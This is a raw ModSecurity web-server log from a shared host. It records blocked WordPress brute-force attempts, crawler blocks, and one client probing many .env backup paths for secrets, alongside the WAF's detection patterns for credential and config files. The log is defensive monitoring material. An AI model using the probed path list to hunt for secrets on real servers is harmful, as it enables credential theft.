[Tue May 26 17:31:38.979681 2026] [security2:error] [pid 891273:tid 891522] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLosDEzZ8z3jtDm82kvAAAAHc"]
[Tue May 26 17:31:41.547481 2026] [security2:error] [pid 894579:tid 894706] [remote 209.42.20.53:42912] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.20.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWLpQEtZWuWWBGzl__M8wABVX4"]
[Tue May 26 17:31:42.138480 2026] [security2:error] [pid 894579:tid 894720] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLpQEtZWuWWBGzl__M9QAAARQ"]
[Tue May 26 17:31:42.237710 2026] [security2:error] [pid 894579:tid 894795] [client 223.235.98.214:18476] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLpgEtZWuWWBGzl__M9wAAAV4"]
[Tue May 26 17:31:42.237834 2026] [security2:error] [pid 894579:tid 894795] [client 223.235.98.214:18476] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLpgEtZWuWWBGzl__M9wAAAV4"]
[Tue May 26 17:31:43.727801 2026] [security2:error] [pid 894579:tid 894806] [client 45.132.227.214:27903] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.227.132.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahWLpwEtZWuWWBGzl__NAQAAAWk"]
[Tue May 26 17:31:44.093774 2026] [security2:error] [pid 891273:tid 891497] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLp8DEzZ8z3jtDm82k8gAAAF4"]
[Tue May 26 17:31:45.568741 2026] [security2:error] [pid 894579:tid 894792] [client 157.49.241.175:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLqQEtZWuWWBGzl__NEgAAAVs"]
[Tue May 26 17:31:46.430632 2026] [security2:error] [pid 894579:tid 894733] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLqgEtZWuWWBGzl__NIQAAASE"]
[Tue May 26 17:31:47.754287 2026] [security2:error] [pid 891273:tid 891398] [remote 14.161.17.36:51502] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWLq8DEzZ8z3jtDm82lBgAAL3w"]
[Tue May 26 17:31:48.955426 2026] [security2:error] [pid 891273:tid 891504] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLrMDEzZ8z3jtDm82lFAAAAGU"]
[Tue May 26 17:31:51.164475 2026] [security2:error] [pid 894579:tid 894740] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLrgEtZWuWWBGzl__NSgAAASg"]
[Tue May 26 17:31:52.725377 2026] [security2:error] [pid 894579:tid 894792] [client 223.235.98.214:22893] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLsAEtZWuWWBGzl__NUgAAAVs"]
[Tue May 26 17:31:52.725973 2026] [security2:error] [pid 894579:tid 894792] [client 223.235.98.214:22893] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLsAEtZWuWWBGzl__NUgAAAVs"]
[Tue May 26 17:31:53.339458 2026] [security2:error] [pid 894579:tid 894581] [remote 211.23.68.235:45980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWLsQEtZWuWWBGzl__NWQABPgE"]
[Tue May 26 17:31:53.569927 2026] [security2:error] [pid 894579:tid 894809] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLsQEtZWuWWBGzl__NWAAAAWw"]
[Tue May 26 17:31:55.998288 2026] [security2:error] [pid 891273:tid 891415] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLs8DEzZ8z3jtDm82ljgAAAAw"]
[Tue May 26 17:31:56.723812 2026] [security2:error] [pid 894579:tid 894743] [client 5.255.127.96:60812] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.tickerbell.tech"] [uri "/___proxy_subdomain_webmail/api/.env"] [unique_id "ahWLtAEtZWuWWBGzl__NtQAAASs"]
[Tue May 26 17:31:56.724868 2026] [security2:error] [pid 894579:tid 894818] [client 5.255.127.96:60776] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.tickerbell.tech"] [uri "/___proxy_subdomain_webmail/app/.env"] [unique_id "ahWLtAEtZWuWWBGzl__NvgAAAXU"]
[Tue May 26 17:31:56.727959 2026] [security2:error] [pid 894579:tid 894754] [client 5.255.127.96:60824] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.tickerbell.tech"] [uri "/___proxy_subdomain_webmail/backend/.env"] [unique_id "ahWLtAEtZWuWWBGzl__NxwAAATY"]
[Tue May 26 17:31:56.744510 2026] [security2:error] [pid 894579:tid 894717] [client 5.255.127.96:60774] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.tickerbell.tech"] [uri "/___proxy_subdomain_webmail/.env"] [unique_id "ahWLtAEtZWuWWBGzl__N0AAAARE"]
[Tue May 26 17:31:58.272188 2026] [security2:error] [pid 894579:tid 894726] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLtQEtZWuWWBGzl__OBAAAARo"]
[Tue May 26 17:31:58.315983 2026] [security2:error] [pid 894579:tid 894599] [remote 176.61.149.56:44344] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.149.61.176.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWLtgEtZWuWWBGzl__OEAABHxM"]
[Tue May 26 17:31:59.065191 2026] [security2:error] [pid 894579:tid 894758] [client 5.255.127.96:60812] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webmail.tickerbell.tech"] [uri "/___proxy_subdomain_webmail/.env.production.copy"] [unique_id "ahWLtwEtZWuWWBGzl__OLwAAATo"]
[Tue May 26 17:31:59.287089 2026] [security2:error] [pid 894579:tid 894694] [remote 74.7.241.58:37012] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWLtwEtZWuWWBGzl__OOAABb3I"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/afstpaul.org/wp-content/plugins/woocommerce/templates/emails
[Tue May 26 17:31:59.715573 2026] [security2:error] [pid 894579:tid 894752] [client 5.255.127.96:61080] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.tickerbell.tech"] [uri "/___proxy_subdomain_webmail/.env.bak"] [unique_id "ahWLtwEtZWuWWBGzl__OSgAAATQ"]
[Tue May 26 17:31:59.721201 2026] [security2:error] [pid 894579:tid 894820] [client 5.255.127.96:61306] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webmail.tickerbell.tech"] [uri "/___proxy_subdomain_webmail/.env.production.orig"] [unique_id "ahWLtwEtZWuWWBGzl__OTgAAAXc"]
[Tue May 26 17:31:59.722492 2026] [security2:error] [pid 894579:tid 894838] [client 5.255.127.96:61286] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.tickerbell.tech"] [uri "/___proxy_subdomain_webmail/.env.production~"] [unique_id "ahWLtwEtZWuWWBGzl__OTwAAAYk"]
[Tue May 26 17:31:59.723336 2026] [security2:error] [pid 894579:tid 894718] [client 5.255.127.96:61160] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webmail.tickerbell.tech"] [uri "/___proxy_subdomain_webmail/.env.copy"] [unique_id "ahWLtwEtZWuWWBGzl__OUAAAARI"]
[Tue May 26 17:31:59.723702 2026] [security2:error] [pid 894579:tid 894770] [client 5.255.127.96:61214] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webmail.tickerbell.tech"] [uri "/___proxy_subdomain_webmail/.env.local.swp"] [unique_id "ahWLtwEtZWuWWBGzl__OUQAAAUU"]
[Tue May 26 17:31:59.724604 2026] [security2:error] [pid 894579:tid 894814] [client 5.255.127.96:61242] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.tickerbell.tech"] [uri "/___proxy_subdomain_webmail/.env.production.bak"] [unique_id "ahWLtwEtZWuWWBGzl__OVAAAAXE"]
[Tue May 26 17:31:59.724989 2026] [security2:error] [pid 894579:tid 894836] [client 5.255.127.96:61170] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.tickerbell.tech"] [uri "/___proxy_subdomain_webmail/.env.local.bak"] [unique_id "ahWLtwEtZWuWWBGzl__OVQAAAYc"]
[Tue May 26 17:31:59.724999 2026] [security2:error] [pid 894579:tid 894737] [client 5.255.127.96:61226] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webmail.tickerbell.tech"] [uri "/___proxy_subdomain_webmail/.env.local.copy"] [unique_id "ahWLtwEtZWuWWBGzl__OUwAAASU"]
[Tue May 26 17:31:59.725747 2026] [security2:error] [pid 894579:tid 894718] [client 5.255.127.96:61256] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.tickerbell.tech"] [uri "/___proxy_subdomain_webmail/.env.production.backup"] [unique_id "ahWLtwEtZWuWWBGzl__OVwAAARI"]
[Tue May 26 17:31:59.726691 2026] [security2:error] [pid 891273:tid 891489] [client 5.255.127.96:61294] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webmail.tickerbell.tech"] [uri "/___proxy_subdomain_webmail/.env.production.swp"] [unique_id "ahWLt8DEzZ8z3jtDm82mAQAAAFY"]
[Tue May 26 17:31:59.727721 2026] [security2:error] [pid 894579:tid 894838] [client 5.255.127.96:61068] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webmail.tickerbell.tech"] [uri "/___proxy_subdomain_webmail/.env.local.old"] [unique_id "ahWLtwEtZWuWWBGzl__OVgAAAYk"]
[Tue May 26 17:31:59.728128 2026] [security2:error] [pid 894579:tid 894724] [client 5.255.127.96:61086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webmail.tickerbell.tech"] [uri "/___proxy_subdomain_webmail/.env.old"] [unique_id "ahWLtwEtZWuWWBGzl__OWAAAARg"]
[Tue May 26 17:31:59.728129 2026] [security2:error] [pid 891273:tid 891497] [client 5.255.127.96:61140] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webmail.tickerbell.tech"] [uri "/___proxy_subdomain_webmail/.env.swp"] [unique_id "ahWLt8DEzZ8z3jtDm82mAgAAAF4"]
[Tue May 26 17:31:59.728178 2026] [security2:error] [pid 894579:tid 894742] [client 5.255.127.96:61102] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webmail.tickerbell.tech"] [uri "/___proxy_subdomain_webmail/.env.production.old"] [unique_id "ahWLtwEtZWuWWBGzl__OWQAAASo"]
[Tue May 26 17:31:59.728190 2026] [security2:error] [pid 894579:tid 894718] [client 5.255.127.96:61124] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.tickerbell.tech"] [uri "/___proxy_subdomain_webmail/.env~"] [unique_id "ahWLtwEtZWuWWBGzl__OWgAAARI"]
[Tue May 26 17:31:59.728843 2026] [security2:error] [pid 891273:tid 891484] [client 5.255.127.96:61204] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.tickerbell.tech"] [uri "/___proxy_subdomain_webmail/.env.local~"] [unique_id "ahWLt8DEzZ8z3jtDm82mBAAAAFE"]
[Tue May 26 17:31:59.729612 2026] [security2:error] [pid 894579:tid 894722] [client 5.255.127.96:60776] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.tickerbell.tech"] [uri "/___proxy_subdomain_webmail/.env.backup"] [unique_id "ahWLtwEtZWuWWBGzl__OWwAAARY"]
[Tue May 26 17:31:59.729707 2026] [security2:error] [pid 891273:tid 891416] [client 5.255.127.96:61176] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.tickerbell.tech"] [uri "/___proxy_subdomain_webmail/.env.local.backup"] [unique_id "ahWLt8DEzZ8z3jtDm82mAwAAAA0"]
[Tue May 26 17:31:59.739207 2026] [security2:error] [pid 894579:tid 894756] [client 5.255.127.96:61148] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webmail.tickerbell.tech"] [uri "/___proxy_subdomain_webmail/.env.orig"] [unique_id "ahWLtwEtZWuWWBGzl__OXAAAATg"]
[Tue May 26 17:31:59.739425 2026] [security2:error] [pid 891273:tid 891415] [client 5.255.127.96:61222] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webmail.tickerbell.tech"] [uri "/___proxy_subdomain_webmail/.env.local.orig"] [unique_id "ahWLt8DEzZ8z3jtDm82mBQAAAAw"]
[Tue May 26 17:32:00.532037 2026] [security2:error] [pid 894579:tid 894741] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLuAEtZWuWWBGzl__OaQAAASk"]
[Tue May 26 17:32:00.567531 2026] [security2:error] [pid 894579:tid 894729] [client 47.128.51.62:39180] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "gcirsm.org.in"] [uri "/robots.txt"] [unique_id "ahWLuAEtZWuWWBGzl__OcwAAAR0"]
[Tue May 26 17:32:01.254120 2026] [security2:error] [pid 894579:tid 894829] [client 185.244.9.147:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahWLuAEtZWuWWBGzl__OcgAAAYA"]
[Tue May 26 17:32:02.819347 2026] [security2:error] [pid 891273:tid 891427] [client 81.22.193.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWLusDEzZ8z3jtDm82mOgAAABg"], referer: https://anujtradingco.com
[Tue May 26 17:32:03.092665 2026] [security2:error] [pid 891273:tid 891502] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLusDEzZ8z3jtDm82mNQAAAGM"]
[Tue May 26 17:32:03.235511 2026] [security2:error] [pid 891273:tid 891467] [client 223.235.98.214:8220] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLu8DEzZ8z3jtDm82mSwAAAEA"]
[Tue May 26 17:32:03.235803 2026] [security2:error] [pid 891273:tid 891467] [client 223.235.98.214:8220] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLu8DEzZ8z3jtDm82mSwAAAEA"]
[Tue May 26 17:32:04.919036 2026] [security2:error] [pid 894579:tid 894748] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLvAEtZWuWWBGzl__O9QAAATA"]
[Tue May 26 17:32:08.551545 2026] [security2:error] [pid 894579:tid 894782] [client 74.7.175.131:60906] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.suas.onesoft.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWLwAEtZWuWWBGzl__PjgABUWE"]
